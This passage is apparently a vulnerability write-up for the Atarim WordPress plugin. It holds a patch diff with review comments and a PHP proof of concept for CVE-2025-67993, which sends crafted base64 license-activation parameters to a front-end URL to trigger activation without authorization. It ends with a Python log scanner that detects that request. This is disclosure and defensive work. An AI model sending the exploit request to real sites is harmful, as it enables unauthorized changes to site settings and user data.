+            __( 'You are not allowed to access this resource.', 'atarim-visual-collaboration' ),
+            array( 'status' => rest_authorization_required_code() )
+        );
+    }
+
+    return true;
+}
+
 add_action( 'rest_api_init', function () {
     register_rest_route( 'atarim/v1', '/db/vc', array(
         'methods' => 'GET',
         'callback' => 'wpf_visual_composer_api',
-        'permission_callback' => '__return_true'
+        'permission_callback' => 'wpf_visual_composer_api_permissions',
     ) );
 } );
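Review bot: `edit_posts` is held by Contributors, so any account that can draft a post can read `atarim/v1/db/vc`; if the route returns page-builder data for arbitrary posts, gate it on a capability matching what it exposes (`edit_others_posts`, or `current_user_can( 'edit_post', $id )` per requested post). The explicit `is_user_logged_in()` branch is redundant with `current_user_can()` but harmless; `rest_authorization_required_code()` already returns 401 for anonymous callers and 403 for authenticated ones.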

--- a/atarim-visual-collaboration/inc/wpf_function.php
+++ b/atarim-visual-collaboration/inc/wpf_function.php
@@ -729,15 +729,6 @@
     }
 }

-/*
- * push to media icon
- */
-if ( ! function_exists( 'get_wpf_push_to_media_icon' ) ) {
-    function get_wpf_push_to_media_icon() {
-        return '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="32pt" height="31pt" viewBox="0 0 32 31" version="1.1"><g id="surface1"><path style=" stroke:none;fill-rule:nonzero;fill:#ffffff;fill-opacity:1;" d="M 16.234375 16.746094 L 13.558594 24.3125 L 13.550781 24.3125 L 11.476562 30.09375 C 11.621094 30.132812 11.761719 30.164062 11.910156 30.203125 C 11.917969 30.203125 11.925781 30.203125 11.933594 30.203125 C 13.222656 30.535156 14.578125 30.71875 15.972656 30.71875 C 16.667969 30.71875 17.34375 30.679688 18.007812 30.574219 C 18.921875 30.464844 19.800781 30.277344 20.660156 30.015625 C 20.871094 29.953125 21.082031 29.878906 21.296875 29.808594 C 21.066406 29.335938 20.578125 28.28125 20.554688 28.234375 Z M 16.234375 16.746094 "/><path style=" stroke:none;fill-rule:nonzero;fill:#ffffff;fill-opacity:1;" d="M 1.6875 9.5625 C 0.871094 11.351562 0.316406 13.550781 0.316406 15.535156 C 0.316406 16.03125 0.339844 16.53125 0.390625 17.019531 C 0.953125 22.652344 4.707031 27.382812 9.867188 29.507812 C 10.078125 29.59375 10.300781 29.683594 10.519531 29.761719 L 2.929688 9.570312 C 2.277344 9.546875 2.152344 9.585938 1.6875 9.5625 Z M 1.6875 9.5625 "/><path style=" stroke:none;fill-rule:nonzero;fill:#ffffff;fill-opacity:1;" d="M 30.210938 9.160156 C 29.859375 8.425781 29.441406 7.722656 28.976562 7.058594 C 28.847656 6.867188 28.699219 6.675781 28.5625 6.488281 C 26.804688 4.210938 24.414062 2.421875 21.628906 1.378906 C 19.882812 0.714844 17.972656 0.351562 15.980469 0.351562 C 11.058594 0.351562 6.660156 2.566406 3.785156 6.019531 C 3.253906 6.652344 2.78125 7.332031 2.355469 8.046875 C 3.515625 8.054688 4.953125 8.054688 5.117188 8.054688 C 6.59375 8.054688 8.871094 7.878906 8.871094 7.878906 C 9.640625 7.832031 9.71875 8.914062 8.960938 9.003906 C 8.960938 9.003906 8.195312 9.089844 7.34375 9.128906 L 12.480469 23.917969 L 15.566406 14.957031 L 13.378906 9.136719 C 12.609375 9.097656 11.898438 9.011719 11.898438 
9.011719 C 11.132812 8.972656 11.230469 7.839844 11.980469 7.886719 C 11.980469 7.886719 14.308594 8.0625 15.695312 8.0625 C 17.171875 8.0625 19.453125 7.886719 19.453125 7.886719 C 20.210938 7.839844 20.308594 8.921875 19.539062 9.011719 C 19.539062 9.011719 18.78125 9.097656 17.933594 9.136719 L 23.019531 23.816406 L 24.429688 19.257812 C 25.140625 17.488281 25.5 16.023438 25.5 14.855469 C 25.5 13.171875 24.871094 12 24.332031 11.089844 C 23.621094 9.960938 22.953125 9.011719 22.953125 7.894531 C 22.953125 6.636719 23.933594 5.46875 25.320312 5.46875 C 25.378906 5.46875 25.441406 5.46875 25.5 5.46875 C 27.640625 5.414062 28.339844 7.46875 28.429688 8.867188 C 28.429688 8.867188 28.429688 8.898438 28.429688 8.914062 C 28.464844 9.484375 28.4375 9.902344 28.4375 10.402344 C 28.4375 11.777344 28.167969 13.335938 27.371094 15.289062 L 24.1875 24.210938 L 22.367188 29.40625 C 22.511719 29.34375 22.652344 29.277344 22.796875 29.207031 C 27.425781 27.042969 30.796875 22.722656 31.507812 17.605469 C 31.613281 16.933594 31.664062 16.246094 31.664062 15.550781 C 31.664062 13.265625 31.140625 11.097656 30.210938 9.160156 Z M 30.210938 9.160156 "/></g></svg>';
-    }
-}
-
 if ( ! function_exists( 'wpf_get_current_user_information' ) ) {
     function wpf_get_current_user_information( $author_id = '' ) {
         $response = array();
--- a/atarim-visual-collaboration/inc/wpf_popup_string.php
+++ b/atarim-visual-collaboration/inc/wpf_popup_string.php
@@ -21,7 +21,6 @@
 $wpf_task_text_error_msg     = __( 'A user must be selected to post a comment', 'atarim-visual-collaboration' );
 $wpf_task_note_error_msg     = __( 'Task cannot be created with note', 'atarim-visual-collaboration' );
 $wpf_task_upload_error_msg   = __( 'Please post your comment before performing this action', 'atarim-visual-collaboration' );
-$wpf_push_to_media_error_msg = __( 'The website server didn't respond,  please try again', 'atarim-visual-collaboration' );
 $wpf_upload_invalid_file_msg = __( 'The website server didn't respond to the file upload,  please try again', 'atarim-visual-collaboration' );
 $wpf_resolution              = __( 'Screen Size:', 'atarim-visual-collaboration' );
 $wpf_browser                 = __( 'Browser:', 'atarim-visual-collaboration' );
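Review bot: `$wpf_push_to_media_error_msg` is removed here, but the pre-patch `$all_popup_lable` assignment in the next hunk emits `wpf_push_to_media_error_msg= "' . addslashes( $wpf_push_to_media_error_msg ) . '"`, and the replacement line is cut off in this rendering before that point; confirm the `+` line drops it, otherwise the inline script hits an undefined variable. Separately, both this line and the kept `$wpf_upload_invalid_file_msg` contain `didn't` inside a single-quoted PHP string; as shown that is a parse error, so the apostrophe must be escaped in the real file, which suggests this rendering has stripped backslashes.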
@@ -49,5 +48,5 @@
 $switch_to_normal            = __( 'Switch to a normal task' , 'atarim-visual-collaboration' );
 $switch_to_internal          = __( 'Switch to an Internal task' , 'atarim-visual-collaboration' );
 $add_note                    = __( 'Create a private message that only team members can see', 'atarim-visual-collaboration' );
-$all_popup_lable             = '<script>var wpf_remap_text="' . addslashes( $wpf_remap_text ) . '", wpf_general_task_option="' . addslashes( $wpf_general_task_option ) . '", wpf_tasks_found="' . addslashes( $wpf_tasks_found ) . '", wpf_bulk_editing_tasks="' . addslashes( $wpf_bulk_editing_tasks ) . '", wpf_remove_login_parameter="' . addslashes( $wpf_remove_login_parameter ) . '", wpf_share_task_link="' . addslashes( $wpf_share_task_link ) . '", wpf_custom_tags="' . addslashes( $wpf_custom_tags ) . '", wpf_additional_information="' . addslashes( $wpf_additional_information ) . '", wpf_priority_low="' . addslashes( $wpf_priority_low ) . '", wpf_priority_medium= "' . addslashes( $wpf_priority_medium ) . '", wpf_priority_high="' . addslashes( $wpf_priority_high ) . '", wpf_priority_critical="' . addslashes( $wpf_priority_critical ) . '", wpf_status_open_task="' . addslashes( $wpf_status_open_task ) . '", wpf_status_in_progress= "' . addslashes( $wpf_status_in_progress ) . '", wpf_status_pending_review="' . addslashes( $wpf_status_pending_review ) . '", wpf_status_complete="' . addslashes( $wpf_status_complete ) . '", wpf_complete_task="' . addslashes( $wpf_complete_task ) . '", wpf_completed_task="' . addslashes( $wpf_completed_task ) . '", wpf_screenshot_view = "' . addslashes( $wpf_screenshot_view ) . '", wpf_comment_box_placeholder="' . addslashes( $wpf_comment_box_placeholder ) . '", wpf_create_task="' . addslashes( $wpf_create_task ) . '", wpf_add_comment_btn="' . addslashes( $wpf_add_comment_btn ) . '", wpf_mark_internal_btn="' . addslashes( $wpf_mark_internal_btn ) . '", wpf_task_text_error_msg="' . addslashes( $wpf_task_text_error_msg ) . '", wpf_task_note_error_msg="' . addslashes( $wpf_task_note_error_msg ) . '" , wpf_upload_invalid_file_msg="' . addslashes( $wpf_upload_invalid_file_msg ) . '", wpf_resolution="' . addslashes( $wpf_resolution ) . '", wpf_browser="' . addslashes( $wpf_browser ) . '", wpf_user_name="' . addslashes( $wpf_user_name ) . 
'", wpf_user_ip="' . addslashes( $wpf_user_ip ) . '", wpf_task_id="' . addslashes( $wpf_task_id ) . '", wpf_delete_ticket="' . addslashes( $wpf_delete_ticket ) . '", wpf_delete_conform_text1="' . addslashes( $wpf_delete_conform_text1 ) . '", wpf_delete_conform_text2="' . addslashes( $wpf_delete_conform_text2 ) . '", wpf_yes="' . addslashes( $wpf_yes ) . '", wpf_general_tag="' . addslashes( $wpf_general_tag ) . '", wpf_email_tag="' . addslashes( $wpf_email_tag ) . '", wpf_just_now="' . addslashes( $wpf_just_now ) . '", wpf_task_upload_error_msg="' . addslashes( $wpf_task_upload_error_msg ) . '", wpf_send_message_text= "' . addslashes( $wpf_send_message_text ) . '", wpf_push_to_media_error_msg= "' . addslashes( $wpf_push_to_media_error_msg ) . '", wpf_by="' . addslashes( $wpf_by ) . '", create_internal_task= "' . addslashes( $create_internal_task ) . '", switch_to_normal= "' . addslashes( $switch_to_normal ) . '", switch_to_internal= "' . addslashes( $switch_to_internal ) . '", add_note= "' . addslashes( $add_note ) . '"</script>';
+$all_popup_lable             = '<script>var wpf_remap_text="' . addslashes( $wpf_remap_text ) . '", wpf_general_task_option="' . addslashes( $wpf_general_task_option ) . '", wpf_tasks_found="' . addslashes( $wpf_tasks_found ) . '", wpf_bulk_editing_tasks="' . addslashes( $wpf_bulk_editing_tasks ) . '", wpf_remove_login_parameter="' . addslashes( $wpf_remove_login_parameter ) . '", wpf_share_task_link="' . addslashes( $wpf_share_task_link ) . '", wpf_custom_tags="' . addslashes( $wpf_custom_tags ) . '", wpf_additional_information="' . addslashes( $wpf_additional_information ) . '", wpf_priority_low="' . addslashes( $wpf_priority_low ) . '", wpf_priority_medium= "' . addslashes( $wpf_priority_medium ) . '", wpf_priority_high="' . addslashes( $wpf_priority_high ) . '", wpf_priority_critical="' . addslashes( $wpf_priority_critical ) . '", wpf_status_open_task="' . addslashes( $wpf_status_open_task ) . '", wpf_status_in_progress= "' . addslashes( $wpf_status_in_progress ) . '", wpf_status_pending_review="' . addslashes( $wpf_status_pending_review ) . '", wpf_status_complete="' . addslashes( $wpf_status_complete ) . '", wpf_complete_task="' . addslashes( $wpf_complete_task ) . '", wpf_completed_task="' . addslashes( $wpf_completed_task ) . '", wpf_screenshot_view = "' . addslashes( $wpf_screenshot_view ) . '", wpf_comment_box_placeholder="' . addslashes( $wpf_comment_box_placeholder ) . '", wpf_create_task="' . addslashes( $wpf_create_task ) . '", wpf_add_comment_btn="' . addslashes( $wpf_add_comment_btn ) . '", wpf_mark_internal_btn="' . addslashes( $wpf_mark_internal_btn ) . '", wpf_task_text_error_msg="' . addslashes( $wpf_task_text_error_msg ) . '", wpf_task_note_error_msg="' . addslashes( $wpf_task_note_error_msg ) . '" , wpf_upload_invalid_file_msg="' . addslashes( $wpf_upload_invalid_file_msg ) . '", wpf_resolution="' . addslashes( $wpf_resolution ) . '", wpf_browser="' . addslashes( $wpf_browser ) . '", wpf_user_name="' . addslashes( $wpf_user_name ) . 
'", wpf_user_ip="' . addslashes( $wpf_user_ip ) . '", wpf_task_id="' . addslashes( $wpf_task_id ) . '", wpf_delete_ticket="' . addslashes( $wpf_delete_ticket ) . '", wpf_delete_conform_text1="' . addslashes( $wpf_delete_conform_text1 ) . '", wpf_delete_conform_text2="' . addslashes( $wpf_delete_conform_text2 ) . '", wpf_yes="' . addslashes( $wpf_yes ) . '", wpf_general_tag="' . addslashes( $wpf_general_tag ) . '", wpf_email_tag="' . addslashes( $wpf_email_tag ) . '", wpf_just_now="' . addslashes( $wpf_just_now ) . '", wpf_task_upload_error_msg="' . addslashes( $wpf_task_upload_error_msg ) . '", wpf_send_message_text= "' . addslashes( $wpf_send_message_text ) . '", wpf_by="' . addslashes( $wpf_by ) . '", create_internal_task= "' . addslashes( $create_internal_task ) . '", switch_to_normal= "' . addslashes( $switch_to_normal ) . '", switch_to_internal= "' . addslashes( $switch_to_internal ) . '", add_note= "' . addslashes( $add_note ) . '"</script>';
 _e( $all_popup_lable );
 No newline at end of file
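Review bot: the `+` line drops `wpf_push_to_media_error_msg` from the inline `<script>` variable list, but nothing in the hunk shows the JavaScript that consumed that global being updated; confirm no script still references it, or it will be undefined after this change. Separately, both the old and new lines rely on `addslashes()` to place translated strings inside a JavaScript string literal, and `addslashes()` is not a JavaScript escaper: it does not neutralise a `</script>` sequence or a newline inside a translation, either of which would terminate the script element early. Passing the labels as an array to `wp_localize_script()` or emitting them through `wp_json_encode()` is the WordPress idiom for this. Likewise `_e( $all_popup_lable )` hands a computed, non-literal string to a translation function, which defeats the text-domain lookup; a plain `echo` of the already-escaped markup is the intended call.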

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67993 - Atarim <= 4.2.1 - Missing Authorization

$target_url = 'http://vulnerable-wordpress-site.com/';

// Base64-encoded values simulating a license activation payload.
// These would normally be provided by the Atarim service during legitimate activation.
$payload = [
    'atarim_response' => 'd3BmX2xpY2Vuc2Vfa2V5X2hlcmU=', // base64_encode('wpf_license_key_here')
    'license_key'     => 'bGljZW5zZV9rZXlfZW5jb2RlZA==', // base64_encode('license_key_encoded')
    'expires'         => 'MjAyNS0xMi0zMQ==',             // base64_encode('2025-12-31')
    'prod_id'         => 'cHJvZF8xMjM=',                 // base64_encode('prod_123')
    'payment_id'      => 'cGF5bWVudF8xMjM=',             // base64_encode('payment_123')
    'checksum'        => 'Y2hlY2tzdW1fYWJj',             // base64_encode('checksum_abc')
    'wpf_site_id'     => 'c2l0ZV8xMjM=',                 // base64_encode('site_123')
];

// Build the query string; the handler runs on `init`, so any front-end URL works.
$query_string = http_build_query($payload);
$attack_url   = $target_url . '?' . $query_string;

echo "[*] Target: $target_url\n";
echo "[*] Sending exploit request to trigger license activation...\n";

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
if ($response === false) {
    echo "[-] Request failed: " . curl_error($ch) . "\n";
}
$http_code    = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$redirect_url = curl_getinfo($ch, CURLINFO_REDIRECT_URL);

curl_close($ch);

// Analyze response
echo "[+] HTTP Response Code: $http_code\n";
if ($redirect_url) {
    echo "[+] Redirected to: $redirect_url\n";
}

if ($http_code == 200 || $http_code == 302 || $http_code == 301) {
    echo "[!] Exploit likely successful. License activation triggered.\n";
    echo "[!] The plugin options and user metadata may have been modified.\n";
} else {
    echo "[-] Exploit may have failed. Site might be patched or unreachable.\n";
}

?>
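Defender-side companion to the PoC above, added here as an example and not Atomic Edge's or Atarim's code: a scanner that flags requests carrying the `atarim_response` trigger in combined-format (Apache/Nginx) access logs, decodes the base64 license fields the PoC sends so an analyst can read them, and separates hits on front-end URLs (the unauthenticated path, since the handler runs on `init`) from hits under `/wp-admin/`. The log lines, IPs, hostnames and timestamps are constructed for this example.

```python
"""Flag Atarim license-activation callback hits in web server access logs.

Added example for this write-up, not Atomic Edge's or Atarim's code.
The sample log lines, IPs and timestamps below are constructed.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Query parameters the activation handler consumes (names taken from the PoC).
TRIGGER = "atarim_response"
LICENSE_PARAMS = ("license_key", "expires", "prod_id", "payment_id", "checksum", "wpf_site_id")

# Combined log format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


@dataclass
class Finding:
    ip: str
    time: str
    path: str
    status: int
    params: Dict[str, str]   # decoded values, keyed by parameter name
    front_end: bool          # True when the hit is outside /wp-admin/
    full_payload: bool       # True when every license field is present


def decode_b64(value: str) -> str:
    """Best-effort base64 decode for triage; returns the raw value when it is not base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return value


def inspect_path(path: str) -> Optional[Dict[str, str]]:
    """Return decoded activation parameters, or None if the request is not a callback hit."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if TRIGGER not in query:
        return None
    return {name: decode_b64(query[name][0])
            for name in (TRIGGER,) + LICENSE_PARAMS if name in query}


def scan_log(lines: List[str]) -> List[Finding]:
    """Parse each line and collect callback hits; unparseable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        params = inspect_path(m["path"])
        if params is None:
            continue
        findings.append(Finding(
            ip=m["ip"], time=m["time"], path=m["path"], status=int(m["status"]),
            params=params,
            # The handler runs on `init`, so a front-end URL is the tell-tale of an
            # unauthenticated trigger; an admin-page hit may be a legitimate activation.
            front_end=not urlsplit(m["path"]).path.startswith("/wp-admin/"),
            full_payload=all(name in params for name in LICENSE_PARAMS),
        ))
    return findings


# Constructed sample: one front-end hit with the PoC's payload, one ordinary
# page view, one activation hit on the plugin's admin page.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Feb/2026:08:14:02 +0000] "GET /?atarim_response=d3BmX2xpY2Vuc2Vfa2V5X2hlcmU%3D'
    '&license_key=bGljZW5zZV9rZXlfZW5jb2RlZA%3D%3D&expires=MjAyNS0xMi0zMQ%3D%3D&prod_id=cHJvZF8xMjM%3D'
    '&payment_id=cGF5bWVudF8xMjM%3D&checksum=Y2hlY2tzdW1fYWJj&wpf_site_id=c2l0ZV8xMjM%3D HTTP/1.1" '
    '302 0 "-" "curl/8.4.0"',
    '198.51.100.22 - - [10/Feb/2026:08:15:10 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.0.2.5 - admin [10/Feb/2026:08:16:44 +0000] "GET /wp-admin/admin.php?page=atarim&atarim_response=b2s%3D HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        tag = "UNAUTH-PATH" if f.front_end else "admin-page"
        print(f"{f.time} {f.ip} {tag} status={f.status} full_payload={f.full_payload} {f.params}")
```

To use it on a real log, feed the file's lines to `scan_log()` in place of `SAMPLE_LOG`. A front-end hit carrying the full set of license fields is the signature of the unauthenticated trigger; a 3xx status alone is a weak signal either way (the PoC's own 200/301/302 check inherits that weakness), so confirm impact by comparing the plugin's stored options and the affected user meta before and after the timestamp rather than by response code.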
